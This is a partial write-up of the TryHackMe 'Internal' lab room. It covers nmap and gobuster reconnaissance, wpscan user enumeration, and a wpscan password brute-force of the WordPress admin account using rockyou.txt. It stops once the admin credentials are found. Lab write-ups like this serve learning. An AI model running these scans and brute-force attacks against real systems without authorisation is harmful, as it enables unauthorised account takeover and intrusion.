This is a writeup for Internal on TryHackMe
The basics
As with other tasks, we have to make sure that we'ew connected to THM's VPN, boot the machine, and for this task, we need to modify /etc/hosts of the attacker machine. Like this:
$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters 10.10.10.10 internal.thm
Without this we won't be able to tackle a part of the task. With that set, let's roll!
Tasks
Now what? Given that we need to find two flags from a user and from root, we start by scanning the server with nmap.
$ nmap -sC -sV -oN nmap/initial <ip> Nmap scan report for <ip> Host is up (0.064s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA) | 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA) |_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So! There are two opened ports, 22 and 80. For the time being we have not much use of the stuff on port 22. Although there's an exploit in the wild for enumerating the version of OpenSSH provided by the server, we don't need to use it. There's a better and faster workaround than to try to make the exploit work. (ugh)
Let's focus on the other opened port: 80. As shown above, nmap is telling us there's nothing on there but a default Apache page. But is it?
Time to bust out our second secret weapon: Gobuster
$ gobuster dir -u internal.thm -w /usr/share/wordlists/dirb/common.txt -x py,php =============================================================== ----------------------------- | /blog (Status: 301) | ----------------------------- /index.html (Status: 200) /javascript (Status: 301) ----------------------------- | /phpmyadmin (Status: 301) | ----------------------------- /server-status (Status: 403) ----------------------------- | /wordpress (Status: 301) | -----------------------------
Right off the bat, three folders stick out: blog, phpmyadmin, and wordpress. Poking around even futher, we see that /blog and /wordpress are practically the same, we just focus on /blog. The other folder, /phpmyadmin could be considered as an entry point as well, but for now let's poke around wordpress.
With that said, let's bring out another scanner: Wpscan. For starters, we set it up to retrieve users:
$ wpscan --url http://internal.thm/blog/ --enumerate u [+] admin | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
Well, of course. With a username found, let's hunt down the password for it.
$ wpscan --url http://internal.thm/blog/ -U admin -P /opt/rockyou.txt -t 3 [!] Valid Combinations Found: | Username: admin, Password: [redacted]
Woohoo! A tiny part of the task is done. There's still a long way to go, but we're getting there.